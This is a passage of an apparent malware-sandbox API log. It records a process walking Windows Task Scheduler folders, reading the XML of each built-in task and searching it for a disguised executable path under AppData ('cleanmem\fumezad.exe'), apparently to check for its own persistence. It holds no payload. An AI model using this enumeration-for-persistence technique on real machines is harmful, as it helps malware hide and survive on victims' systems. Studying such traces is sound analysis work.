2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)\r\n \r\n \r\n \r\n true\r\n PT30S\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {7CCA6768-8373-4D28-8876-83E8B4E3A969}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.136] IUnknown:Release (This=0x1270c0) returned 0x0 [0139.136] IUnknown:Release (This=0x126f90) returned 0x0 [0139.136] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f90) returned 0x0 [0139.137] ITaskFolderCollection:get_Count (in: This=0x126f90, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.137] IUnknown:Release (This=0x126f90) returned 0x0 [0139.137] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.137] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.137] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fc0) returned 0x0 [0139.139] IRegisteredTaskCollection:get_Count (in: This=0x126fc0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.139] IRegisteredTaskCollection:get_Item (in: This=0x126fc0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127110) returned 0x0 [0139.139] IRegisteredTask:get_Name (in: This=0x127110, pName=0x24da80 | out: pName=0x24da80*="SvcRestartTask") returned 0x0 [0139.139] IRegisteredTask:get_Xml (in: This=0x127110, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)\r\n 1.0\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-201)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n sc.exe\r\n start sppsvc\r\n \r\n \r\n") returned 0x0 [0139.142] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)\r\n 1.0\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-201)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n sc.exe\r\n start sppsvc\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.142] IUnknown:Release (This=0x127110) returned 0x0 [0139.142] IUnknown:Release (This=0x126fc0) returned 0x0 [0139.142] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fc0) returned 0x0 [0139.143] ITaskFolderCollection:get_Count (in: This=0x126fc0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.143] IUnknown:Release (This=0x126fc0) returned 0x0 [0139.143] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.143] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x20, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.143] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fa0) returned 0x0 [0139.144] IRegisteredTaskCollection:get_Count (in: This=0x126fa0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=0) returned 0x0 [0139.144] IUnknown:Release (This=0x126fa0) returned 0x0 [0139.144] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fa0) returned 0x0 [0139.145] ITaskFolderCollection:get_Count (in: This=0x126fa0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.145] IUnknown:Release (This=0x126fa0) returned 0x0 [0139.145] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.145] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x21, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.146] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fa0) returned 0x0 [0139.148] IRegisteredTaskCollection:get_Count (in: This=0x126fa0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.148] IRegisteredTaskCollection:get_Item (in: This=0x126fa0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270e0) returned 0x0 [0139.148] IRegisteredTask:get_Name (in: This=0x1270e0, pName=0x24da80 | out: pName=0x24da80*="SR") returned 0x0 [0139.148] IRegisteredTask:get_Xml (in: This=0x1270e0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\srrstr.dll,-320)\r\n $(@%systemroot%\\system32\\srrstr.dll,-321)\r\n $(@%systemroot%\\system32\\srrstr.dll,-322)\r\n Microsoft\\Windows\\SystemRestore\\SR\r\n \r\n \r\n \r\n 2005-06-14T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT23H\r\n false\r\n false\r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d srrstr.dll,ExecuteScheduledSPPCreation\r\n \r\n \r\n") returned 0x0 [0139.150] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\srrstr.dll,-320)\r\n $(@%systemroot%\\system32\\srrstr.dll,-321)\r\n $(@%systemroot%\\system32\\srrstr.dll,-322)\r\n Microsoft\\Windows\\SystemRestore\\SR\r\n \r\n \r\n \r\n 2005-06-14T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT23H\r\n false\r\n false\r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d srrstr.dll,ExecuteScheduledSPPCreation\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.150] IUnknown:Release (This=0x1270e0) returned 0x0 [0139.150] IUnknown:Release (This=0x126fa0) returned 0x0 [0139.150] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fa0) returned 0x0 [0139.152] ITaskFolderCollection:get_Count (in: This=0x126fa0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.152] IUnknown:Release (This=0x126fa0) returned 0x0 [0139.152] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.152] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.152] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fa0) returned 0x0 [0139.153] IRegisteredTaskCollection:get_Count (in: This=0x126fa0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.154] IRegisteredTaskCollection:get_Item (in: This=0x126fa0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270d0) returned 0x0 [0139.154] IRegisteredTask:get_Name (in: This=0x1270d0, pName=0x24da80 | out: pName=0x24da80*="Interactive") returned 0x0 [0139.154] IRegisteredTask:get_Xml (in: This=0x1270d0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\wdc.dll,-10041)\r\n 1.0\r\n $(@%systemroot%\\system32\\wdc.dll,-10042)\r\n Microsoft\\Windows\\Task Manager\\Interactive\r\n $(@%systemroot%\\system32\\wdc.dll,-10043)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 5\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {855fec53-d2e4-4999-9e87-3414e9cf0ff4}\r\n \r\n \r\n \r\n") returned 0x0 [0139.156] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\wdc.dll,-10041)\r\n 1.0\r\n $(@%systemroot%\\system32\\wdc.dll,-10042)\r\n Microsoft\\Windows\\Task Manager\\Interactive\r\n $(@%systemroot%\\system32\\wdc.dll,-10043)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 5\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {855fec53-d2e4-4999-9e87-3414e9cf0ff4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.156] IUnknown:Release (This=0x1270d0) returned 0x0 [0139.156] IUnknown:Release (This=0x126fa0) returned 0x0 [0139.156] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fa0) returned 0x0 [0139.157] ITaskFolderCollection:get_Count (in: This=0x126fa0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.157] IUnknown:Release (This=0x126fa0) returned 0x0 [0139.157] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.157] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x23, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.157] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f90) returned 0x0 [0139.160] IRegisteredTaskCollection:get_Count (in: This=0x126f90, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0139.160] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270c0) returned 0x0 [0139.160] IRegisteredTask:get_Name (in: This=0x1270c0, pName=0x24da80 | out: pName=0x24da80*="IpAddressConflict1") returned 0x0 [0139.160] IRegisteredTask:get_Xml (in: This=0x1270c0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict1\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4198]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem\r\n \r\n \r\n") returned 0x0 [0139.163] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict1\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4198]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.163] IUnknown:Release (This=0x1270c0) returned 0x0 [0139.163] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270c0) returned 0x0 [0139.163] IRegisteredTask:get_Name (in: This=0x1270c0, pName=0x24da80 | out: pName=0x24da80*="IpAddressConflict2") returned 0x0 [0139.163] IRegisteredTask:get_Xml (in: This=0x1270c0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict2\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n 2006-02-23T16:27:43\r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4199]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem\r\n \r\n \r\n") returned 0x0 [0139.166] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict2\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n 2006-02-23T16:27:43\r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4199]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.166] IUnknown:Release (This=0x1270c0) returned 0x0 [0139.166] IUnknown:Release (This=0x126f90) returned 0x0 [0139.166] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f90) returned 0x0 [0139.176] ITaskFolderCollection:get_Count (in: This=0x126f90, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.177] IUnknown:Release (This=0x126f90) returned 0x0 [0139.177] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.177] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.177] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fb0) returned 0x0 [0139.187] IRegisteredTaskCollection:get_Count (in: This=0x126fb0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.187] IRegisteredTaskCollection:get_Item (in: This=0x126fb0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127100) returned 0x0 [0139.187] IRegisteredTask:get_Name (in: This=0x127100, pName=0x24da80 | out: pName=0x24da80*="MsCtfMonitor") returned 0x0 [0139.187] IRegisteredTask:get_Xml (in: This=0x127100, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)\r\n Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}\r\n \r\n \r\n") returned 0x0 [0139.190] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)\r\n Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.190] IUnknown:Release (This=0x127100) returned 0x0 [0139.190] IUnknown:Release (This=0x126fb0) returned 0x0 [0139.190] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fb0) returned 0x0 [0139.191] ITaskFolderCollection:get_Count (in: This=0x126fb0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.191] IUnknown:Release (This=0x126fb0) returned 0x0 [0139.191] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.191] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.191] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fb0) returned 0x0 [0139.193] IRegisteredTaskCollection:get_Count (in: This=0x126fb0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.193] IRegisteredTaskCollection:get_Item (in: This=0x126fb0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270f0) returned 0x0 [0139.193] IRegisteredTask:get_Name (in: This=0x1270f0, pName=0x24da80 | out: pName=0x24da80*="SynchronizeTime") returned 0x0 [0139.193] IRegisteredTask:get_Xml (in: This=0x1270f0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\w32time.dll,-200)\r\n $(@%systemroot%\\system32\\w32time.dll,-202)\r\n $(@%systemroot%\\system32\\w32time.dll,-201)\r\n Microsoft\\Windows\\Time Synchronization\\SynchronizeTime\r\n \r\n \r\n \r\n 2005-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\sc.exe\r\n start w32time task_started\r\n \r\n \r\n") returned 0x0 [0139.195] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\w32time.dll,-200)\r\n $(@%systemroot%\\system32\\w32time.dll,-202)\r\n $(@%systemroot%\\system32\\w32time.dll,-201)\r\n Microsoft\\Windows\\Time Synchronization\\SynchronizeTime\r\n \r\n \r\n \r\n 2005-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\sc.exe\r\n start w32time task_started\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.196] IUnknown:Release (This=0x1270f0) returned 0x0 [0139.196] IUnknown:Release (This=0x126fb0) returned 0x0 [0139.196] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fb0) returned 0x0 [0139.197] ITaskFolderCollection:get_Count (in: This=0x126fb0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.197] IUnknown:Release (This=0x126fb0) returned 0x0 [0139.197] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.197] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.197] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f90) returned 0x0 [0139.199] IRegisteredTaskCollection:get_Count (in: This=0x126f90, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.199] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270b0) returned 0x0 [0139.199] IRegisteredTask:get_Name (in: This=0x1270b0, pName=0x24da80 | out: pName=0x24da80*="UPnPHostConfig") returned 0x0 [0139.199] IRegisteredTask:get_Xml (in: This=0x1270b0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\upnphost.dll,-215)\r\n $(@%systemroot%\\system32\\upnphost.dll,-216)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\UPnP\\UPnPHostConfig\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n sc.exe\r\n config upnphost start= auto\r\n \r\n \r\n") returned 0x0 [0139.201] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\upnphost.dll,-215)\r\n $(@%systemroot%\\system32\\upnphost.dll,-216)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\UPnP\\UPnPHostConfig\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n sc.exe\r\n config upnphost start= auto\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.201] IUnknown:Release (This=0x1270b0) returned 0x0 [0139.201] IUnknown:Release (This=0x126f90) returned 0x0 [0139.201] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f90) returned 0x0 [0139.202] ITaskFolderCollection:get_Count (in: This=0x126f90, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.202] IUnknown:Release (This=0x126f90) returned 0x0 [0139.202] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.202] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x27, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.202] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fb0) returned 0x0 [0139.204] IRegisteredTaskCollection:get_Count (in: This=0x126fb0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.204] IRegisteredTaskCollection:get_Item (in: This=0x126fb0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270f0) returned 0x0 [0139.204] IRegisteredTask:get_Name (in: This=0x1270f0, pName=0x24da80 | out: pName=0x24da80*="HiveUploadTask") returned 0x0 [0139.204] IRegisteredTask:get_Xml (in: This=0x1270f0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\User Profile Service\\HiveUploadTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-501)\r\n \r\n \r\n \r\n 2007-08-28T00:00:00\r\n PT1H\r\n 